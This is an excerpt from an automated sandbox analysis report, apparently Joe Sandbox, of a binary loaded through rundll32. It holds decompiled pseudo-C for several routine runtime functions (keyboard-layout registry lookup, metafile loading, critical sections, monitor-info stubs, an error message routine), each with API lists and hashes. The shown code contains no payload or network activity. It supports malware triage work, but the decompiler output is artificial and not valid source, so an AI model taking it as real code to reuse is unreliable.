                          • Opcode Fuzzy Hash: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
                          • Instruction Fuzzy Hash: E151E775A056299BCB26DB58CC81AD9B3FCAF4C304F0451E5F909E7212DA34AFC58FA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E00E4666C(intOrPtr __eax, void* __ebx, void* __fp0) {
                          				intOrPtr _v8;
                          				int _v12;
                          				void* _v16;
                          				char _v20;
                          				void* _v24;
                          				struct HKL__* _v280;
                          				char _v536;
                          				char _v600;
                          				char _v604;
                          				char _v608;
                          				char _v612;
                          				void* _t60;
                          				intOrPtr _t106;
                          				intOrPtr _t111;
                          				void* _t117;
                          				void* _t118;
                          				intOrPtr _t119;
                          				void* _t129;
                          
                          				_t129 = __fp0;
                          				_t117 = _t118;
                          				_t119 = _t118 + 0xfffffda0;
                          				_v612 = 0;
                          				_v8 = __eax;
                          				_push(_t117);
                          				_push(0xe46817);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t119;
                          				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                          					L11:
                          					_pop(_t106);
                          					 *[fs:eax] = _t106;
                          					_push(0xe4681e);
                          					return E00E14068( &_v612);
                          				} else {
                          					 *((intOrPtr*)(_v8 + 0x34)) = E00E13244(1);
                          					E00E14068(_v8 + 0x38);
                          					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                          					if(_t60 < 0) {
                          						L10:
                          						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                          						E00E28DF8( *((intOrPtr*)(_v8 + 0x34)), 1);
                          						goto L11;
                          					} else {
                          						_v20 = _t60 + 1;
                          						_v24 =  &_v280;
                          						do {
                          							if(E00E61A38( *_v24) == 0) {
                          								goto L9;
                          							} else {
                          								_v608 =  *_v24;
                          								_v604 = 0;
                          								if(RegOpenKeyExA(0x80000002, E00E18FD0( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                          									goto L9;
                          								} else {
                          									_push(_t117);
                          									_push(0xe467d3);
                          									_push( *[fs:eax]);
                          									 *[fs:eax] = _t119;
                          									_v12 = 0x100;
                          									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                          										E00E142D8( &_v612, 0x100,  &_v536);
                          										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                          										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                          											E00E142D8(_v8 + 0x38, 0x100,  &_v536);
                          										}
                          									}
                          									_pop(_t111);
                          									 *[fs:eax] = _t111;
                          									_push(0xe467da);
                          									return RegCloseKey(_v16);
                          								}
                          							}
                          							goto L12;
                          							L9:
                          							_v24 = _v24 + 4;
                          							_t38 =  &_v20;
                          							 *_t38 = _v20 - 1;
                          						} while ( *_t38 != 0);
                          						goto L10;
                          					}
                          				}
                          				L12:
                          			}

                          0x00e4666c
                          0x00e4666d
                          0x00e4666f
                          0x00e46678
                          0x00e4667e
                          0x00e46683
                          0x00e46684
                          0x00e46689
                          0x00e4668c
                          0x00e46696
                          0x00e467f8
                          0x00e46800
                          0x00e46803
                          0x00e46806
                          0x00e46816
                          0x00e4669c
                          0x00e466ab
                          0x00e466b4
                          0x00e466c7
                          0x00e466ca
                          0x00e467e7
                          0x00e467ed
                          0x00e467f3
                          0x00000000
                          0x00e466d0
                          0x00e466d1
                          0x00e466da
                          0x00e466dd
                          0x00e466e9
                          0x00000000
                          0x00e466ef
                          0x00e46701
                          0x00e46707
                          0x00e46731
                          0x00000000
                          0x00e46737
                          0x00e46739
                          0x00e4673a
                          0x00e4673f
                          0x00e46742
                          0x00e46745
                          0x00e4676b
                          0x00e4677e
                          0x00e46796
                          0x00e467a4
                          0x00e467b7
                          0x00e467b7
                          0x00e467a4
                          0x00e467be
                          0x00e467c1
                          0x00e467c4
                          0x00e467d2
                          0x00e467d2
                          0x00e46731
                          0x00000000
                          0x00e467da
                          0x00e467da
                          0x00e467de
                          0x00e467de
                          0x00e467de
                          0x00000000
                          0x00e466dd
                          0x00e466ca
                          0x00000000

                          APIs
                          • GetKeyboardLayoutList.USER32(00000040,?,00000000,00E46817,?,00F01458,?,00E46879,00000000,?,00E58E1B), ref: 00E466C2
                          • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00E4672A
                          • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00E467D3,?,80000002,00000000), ref: 00E46764
                          • RegCloseKey.ADVAPI32(?,00E467DA,00000000,?,00000100,00000000,00E467D3,?,80000002,00000000), ref: 00E467CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CloseKeyboardLayoutListOpenQueryValue
                          • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text$|Q
                          • API String ID: 1703357764-2077285645
                          • Opcode ID: 811db18702c71f09efce92346ffa65b08541007719153c2b95fe91c0c2e0fbf7
                          • Instruction ID: 300d2ee2b32f8eedb76f2c1b29a281f8e749bd2e67e7b762b112993f9c5f3f84
                          • Opcode Fuzzy Hash: 811db18702c71f09efce92346ffa65b08541007719153c2b95fe91c0c2e0fbf7
                          • Instruction Fuzzy Hash: CD416674A00208AFDB10DFA4C985BEEB7F8EB49704F9150A5E904F7351D770AE44CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00E33414(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				int _v12;
                          				BYTE* _v16;
                          				intOrPtr _v18;
                          				signed int _v24;
                          				short _v26;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				char _v38;
                          				struct tagMETAFILEPICT _v54;
                          				intOrPtr _v118;
                          				intOrPtr _v122;
                          				struct tagENHMETAHEADER _v154;
                          				intOrPtr _t103;
                          				intOrPtr _t115;
                          				struct HENHMETAFILE__* _t119;
                          				struct HENHMETAFILE__* _t120;
                          				void* _t122;
                          				void* _t123;
                          				void* _t124;
                          				void* _t125;
                          				intOrPtr _t126;
                          
                          				_t124 = _t125;
                          				_t126 = _t125 + 0xffffff68;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t122 = __eax;
                          				E00E332B0(__eax);
                          				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                          				if(_v38 != 0x9ac6cdd7 || E00E31EBC( &_v38) != _v18) {
                          					E00E3106C();
                          				}
                          				_v12 = _v12 - 0x16;
                          				_v16 = E00E126CC(_v12);
                          				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                          				 *[fs:eax] = _t126;
                          				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0xe33583, _t124);
                          				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                          				if(_v24 == 0) {
                          					_v24 = 0x60;
                          				}
                          				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                          				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                          				_v54.mm = 8;
                          				_v54.xExt = 0;
                          				_v54.yExt = 0;
                          				_v54.hMF = 0;
                          				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                          				 *(_t103 + 8) = _t119;
                          				if(_t119 == 0) {
                          					E00E3106C();
                          				}
                          				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                          				_v54.mm = 8;
                          				_v54.xExt = _v122;
                          				_v54.yExt = _v118;
                          				_v54.hMF = 0;
                          				DeleteEnhMetaFile( *(_t103 + 8));
                          				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                          				 *(_t103 + 8) = _t120;
                          				if(_t120 == 0) {
                          					E00E3106C();
                          				}
                          				 *((char*)(_t122 + 0x2c)) = 0;
                          				_pop(_t115);
                          				 *[fs:eax] = _t115;
                          				_push(0xe3358a);
                          				return E00E126EC(_v16);
                          			}

                          0x00e33415
                          0x00e33417
                          0x00e33420
                          0x00e33423
                          0x00e33426
                          0x00e3342a
                          0x00e3343c
                          0x00e33446
                          0x00e33456
                          0x00e33456
                          0x00e3345b
                          0x00e33467
                          0x00e3346a
                          0x00e33478
                          0x00e33486
                          0x00e33490
                          0x00e33499
                          0x00e3349b
                          0x00e3349b
                          0x00e334bb
                          0x00e334d8
                          0x00e334db
                          0x00e334e4
                          0x00e334e9
                          0x00e334ee
                          0x00e33504
                          0x00e33506
                          0x00e3350b
                          0x00e3350d
                          0x00e3350d
                          0x00e3351f
                          0x00e33524
                          0x00e3352e
                          0x00e33534
                          0x00e33539
                          0x00e33540
                          0x00e33558
                          0x00e3355a
                          0x00e3355f
                          0x00e33561
                          0x00e33561
                          0x00e33566
                          0x00e3356c
                          0x00e3356f
                          0x00e33572
                          0x00e33582

                          APIs
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00E334B6
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00E334D3
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00E334FF
                          • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00E3351F
                          • DeleteEnhMetaFile.GDI32(00000016), ref: 00E33540
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00E33553
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: FileMeta$Bits$DeleteHeader
                          • String ID: `
                          • API String ID: 1990453761-2679148245
                          • Opcode ID: aba5534ba10daf67bc5541eac5714ff0c8bdadbafdac474b4ff28a9d1da7d6b6
                          • Instruction ID: fd7dade5cc6e44837844e471fd50950d82eb67deb51a0cf3350a64b004e93fed
                          • Opcode Fuzzy Hash: aba5534ba10daf67bc5541eac5714ff0c8bdadbafdac474b4ff28a9d1da7d6b6
                          • Instruction Fuzzy Hash: 1441FAB5E00208AFDB00DFA8C885AAEBBF9EF48710F119559F904FB245E7359E40CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00E2CAB8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                          				char _v5;
                          				intOrPtr* _v12;
                          				long _v16;
                          				char _v20;
                          				char _v24;
                          				long _t22;
                          				char _t29;
                          				void* _t53;
                          				intOrPtr _t61;
                          				intOrPtr* _t62;
                          				intOrPtr _t63;
                          				intOrPtr _t66;
                          				intOrPtr _t67;
                          				void* _t72;
                          				void* _t73;
                          				intOrPtr _t74;
                          
                          				_t72 = _t73;
                          				_t74 = _t73 + 0xffffffec;
                          				_push(__esi);
                          				_push(__edi);
                          				_t53 = __eax;
                          				_t22 = GetCurrentThreadId();
                          				_t62 =  *0xe7e314; // 0xe7f034
                          				if(_t22 !=  *_t62) {
                          					_v24 = GetCurrentThreadId();
                          					_v20 = 0;
                          					_t61 =  *0xe7e130; // 0xe23cc8
                          					E00E1B9FC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                          					E00E13A00();
                          				}
                          				if(_t53 <= 0) {
                          					E00E2CA90();
                          				} else {
                          					E00E2CA9C(_t53);
                          				}
                          				_v16 = 0;
                          				_push(0xe7f870);
                          				L00E16368();
                          				_push(_t72);
                          				_push(0xe2cc46);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				_v16 = InterlockedExchange(0xe7c404, _v16);
                          				_push(_t72);
                          				_push(0xe2cc27);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                          					_t29 = 0;
                          				} else {
                          					_t29 = 1;
                          				}
                          				_v5 = _t29;
                          				if(_v5 == 0) {
                          					L14:
                          					_pop(_t63);
                          					 *[fs:eax] = _t63;
                          					_push(0xe2cc2e);
                          					return E00E13274(_v16);
                          				} else {
                          					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                          						_v12 = E00E2707C(_v16, 0);
                          						E00E26F6C(_v16, 0);
                          						L00E164A8();
                          						 *[fs:eax] = _t74;
                          						 *[fs:eax] = _t74;
                          						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0xe2cbf1, _t72, 0xe7f870);
                          						_pop(_t66);
                          						 *[fs:eax] = _t66;
                          						_t67 = 0xe2cbc2;
                          						 *[fs:eax] = _t67;
                          						_push(0xe2cbf8);
                          						_push(0xe7f870);
                          						L00E16368();
                          						return 0;
                          					} else {
                          						goto L14;
                          					}
                          				}
                          			}

                          0x00e2cab9
                          0x00e2cabb
                          0x00e2cabf
                          0x00e2cac0
                          0x00e2cac1
                          0x00e2cac3
                          0x00e2cac8
                          0x00e2cad0
                          0x00e2cad7
                          0x00e2cada
                          0x00e2cae4
                          0x00e2caf1
                          0x00e2caf6
                          0x00e2caf6
                          0x00e2cafd
                          0x00e2cb08
                          0x00e2caff
                          0x00e2cb01
                          0x00e2cb01
                          0x00e2cb0f
                          0x00e2cb12
                          0x00e2cb17
                          0x00e2cb1e
                          0x00e2cb1f
                          0x00e2cb24
                          0x00e2cb27
                          0x00e2cb38
                          0x00e2cb3d
                          0x00e2cb3e
                          0x00e2cb43
                          0x00e2cb46
                          0x00e2cb4d
                          0x00e2cb58
                          0x00e2cb5c
                          0x00e2cb5c
                          0x00e2cb5c
                          0x00e2cb5e
                          0x00e2cb65
                          0x00e2cc11
                          0x00e2cc13
                          0x00e2cc16
                          0x00e2cc19
                          0x00e2cc26
                          0x00e2cb6b
                          0x00e2cc0b
                          0x00e2cb7a
                          0x00e2cb82
                          0x00e2cb8c
                          0x00e2cb9c
                          0x00e2cbaa
                          0x00e2cbb5
                          0x00e2cbba
                          0x00e2cbbd
                          0x00e2cbdb
                          0x00e2cbde
                          0x00e2cbe1
                          0x00e2cbe6
                          0x00e2cbeb
                          0x00e2cbf0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e2cc0b

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00E2CAC3
                          • GetCurrentThreadId.KERNEL32 ref: 00E2CAD2
                            • Part of subcall function 00E2CA90: ResetEvent.KERNEL32(0000028C,00E2CB0D), ref: 00E2CA96
                          • RtlEnterCriticalSection.KERNEL32(00E7F870), ref: 00E2CB17
                          • InterlockedExchange.KERNEL32(00E7C404,?), ref: 00E2CB33
                          • RtlLeaveCriticalSection.KERNEL32(00E7F870,00000000,00E2CC27,?,00000000,00E2CC46,?,00E7F870), ref: 00E2CB8C
                          • RtlEnterCriticalSection.KERNEL32(00E7F870,00E2CBF8,00E2CC27,?,00000000,00E2CC46,?,00E7F870), ref: 00E2CBEB
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                          • String ID: LX
                          • API String ID: 2189153385-564891587
                          • Opcode ID: d96c8ada42079490955085f2dc8656a3d28aebe72b346e7342173ff5d714d4dc
                          • Instruction ID: 197b2f070534ded75771781de0fe315bfeae50095fcf11c2b9850a72c78424aa
                          • Opcode Fuzzy Hash: d96c8ada42079490955085f2dc8656a3d28aebe72b346e7342173ff5d714d4dc
                          • Instruction Fuzzy Hash: B031F030A04744AFE711EFA4EC53AADBBE8EB49700FA2A8B4F414B3251D7759D40CA21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00E372A0(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				struct HMONITOR__* _t27;
                          				struct tagMONITORINFO* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0xe7f920 != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						_t29->rcMonitor.left = 0;
                          						_t29->rcMonitor.top = 0;
                          						_t29->rcMonitor.right = GetSystemMetrics(0);
                          						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L00E16548();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					 *0xe7f904 = E00E36F70(4, _t23,  *0xe7f904, _t27, _t29);
                          					_t24 = GetMonitorInfoA(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          0x00e372a9
                          0x00e372ac
                          0x00e372b6
                          0x00e372db
                          0x00e372e3
                          0x00e37303
                          0x00e37308
                          0x00e37313
                          0x00e3731e
                          0x00e37328
                          0x00e37329
                          0x00e3732a
                          0x00e3732b
                          0x00e3732c
                          0x00e3732d
                          0x00e37337
                          0x00e37339
                          0x00e37341
                          0x00e37342
                          0x00e37342
                          0x00e37347
                          0x00e37347
                          0x00e372b8
                          0x00e372ca
                          0x00e372d7
                          0x00e372d7
                          0x00e37351

                          APIs
                          • GetMonitorInfoA.USER32(?,?), ref: 00E372D1
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E372F8
                          • GetSystemMetrics.USER32 ref: 00E3730D
                          • GetSystemMetrics.USER32 ref: 00E37318
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 00E37342
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfo
                          • API String ID: 1539801207-1633989206
                          • Opcode ID: 918fa6a9aea1fc8ac1e045ad4e1b466670ea6e909f8b434b4c620d6d1b432f7d
                          • Instruction ID: 51f5843cb4bdc8a776e1e210df29a38c2781f10884f7e9db3235c0bef2ece59d
                          • Opcode Fuzzy Hash: 918fa6a9aea1fc8ac1e045ad4e1b466670ea6e909f8b434b4c620d6d1b432f7d
                          • Instruction Fuzzy Hash: 8211D3B1609306AFD734CF65AC48BA7BBE8EB45310F006529ED89F7250D770A884CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E00E37374(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0xe7f921 != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *((intOrPtr*)(_t29 + 8)) = 0;
                          						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                          						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L00E16548();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					_t26 =  *0xe7f908; // 0xe37374
                          					 *0xe7f908 = E00E36F70(5, _t23, _t26, _t27, _t29);
                          					_t24 =  *0xe7f908(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          0x00e3737d
                          0x00e37380
                          0x00e3738a
                          0x00e373af
                          0x00e373b7
                          0x00e373d7
                          0x00e373dc
                          0x00e373e7
                          0x00e373f2
                          0x00e373fc
                          0x00e373fd
                          0x00e373fe
                          0x00e373ff
                          0x00e37400
                          0x00e37401
                          0x00e3740b
                          0x00e3740d
                          0x00e37415
                          0x00e37416
                          0x00e37416
                          0x00e3741b
                          0x00e3741b
                          0x00e3738c
                          0x00e37391
                          0x00e3739e
                          0x00e373ab
                          0x00e373ab
                          0x00e37425

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E373CC
                          • GetSystemMetrics.USER32 ref: 00E373E1
                          • GetSystemMetrics.USER32 ref: 00E373EC
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 00E37416
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoA$ts
                          • API String ID: 2545840971-451504685
                          • Opcode ID: b69ee4ddc5f2f75ce828cd312c8d94512db6703b714724fead886f9cda04ce8b
                          • Instruction ID: f62e6a1f7a9d3a08f5db114081d937a40f1d3117270833a2f6d4efa2b08da7f4
                          • Opcode Fuzzy Hash: b69ee4ddc5f2f75ce828cd312c8d94512db6703b714724fead886f9cda04ce8b
                          • Instruction Fuzzy Hash: 9C11DCB1605305AFD720DF61AC48BA7BFE9EB45310F005939EDA9B7250D270B884CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E00E37448(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0xe7f922 != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *((intOrPtr*)(_t29 + 8)) = 0;
                          						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                          						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L00E16548();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					_t26 =  *0xe7f90c; // 0xe37448
                          					 *0xe7f90c = E00E36F70(6, _t23, _t26, _t27, _t29);
                          					_t24 =  *0xe7f90c(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          0x00e37451
                          0x00e37454
                          0x00e3745e
                          0x00e37483
                          0x00e3748b
                          0x00e374ab
                          0x00e374b0
                          0x00e374bb
                          0x00e374c6
                          0x00e374d0
                          0x00e374d1
                          0x00e374d2
                          0x00e374d3
                          0x00e374d4
                          0x00e374d5
                          0x00e374df
                          0x00e374e1
                          0x00e374e9
                          0x00e374ea
                          0x00e374ea
                          0x00e374ef
                          0x00e374ef
                          0x00e37460
                          0x00e37465
                          0x00e37472
                          0x00e3747f
                          0x00e3747f
                          0x00e374f9

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E374A0
                          • GetSystemMetrics.USER32 ref: 00E374B5
                          • GetSystemMetrics.USER32 ref: 00E374C0
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 00E374EA
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoW$Ht
                          • API String ID: 2545840971-3890327271
                          • Opcode ID: f7956d5a20ec46cd0e5b25dd8c7c11a2d12ee1b5e260f75d7f2a278358251ebe
                          • Instruction ID: f4b3a1de49011f92d3a65f466ea0835f7809318ae6ffe9bbc54043ea429d71c5
                          • Opcode Fuzzy Hash: f7956d5a20ec46cd0e5b25dd8c7c11a2d12ee1b5e260f75d7f2a278358251ebe
                          • Instruction Fuzzy Hash: ED11ACB1605315AFD720CF659C48BA7BFE9EF45711F00592AED99B7240D6B0B888CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00E13EEC(void* __ecx) {
                          				long _v4;
                          				int _t3;
                          
                          				if( *0xe7f04c == 0) {
                          					if( *0xe7c030 == 0) {
                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                          					}
                          					return _t3;
                          				} else {
                          					if( *0xe7f220 == 0xd7b2 &&  *0xe7f228 > 0) {
                          						 *0xe7f238();
                          					}
                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                          					return WriteFile(GetStdHandle(0xfffffff5), E00E13F74, 2,  &_v4, 0);
                          				}
                          			}

                          0x00e13ef4
                          0x00e13f54
                          0x00e13f64
                          0x00e13f64
                          0x00e13f6a
                          0x00e13ef6
                          0x00e13eff
                          0x00e13f0f
                          0x00e13f0f
                          0x00e13f2b
                          0x00e13f4c
                          0x00e13f4c

                          APIs
                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?,00E7F638,?,?,`,00E161A1,00E7B459), ref: 00E13F25
                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?,00E7F638,?,?,`,00E161A1,00E7B459), ref: 00E13F2B
                          • GetStdHandle.KERNEL32(000000F5,00E13F74,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?,00E7F638), ref: 00E13F40
                          • WriteFile.KERNEL32(00000000,000000F5,00E13F74,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00E13FBA,?,?), ref: 00E13F46
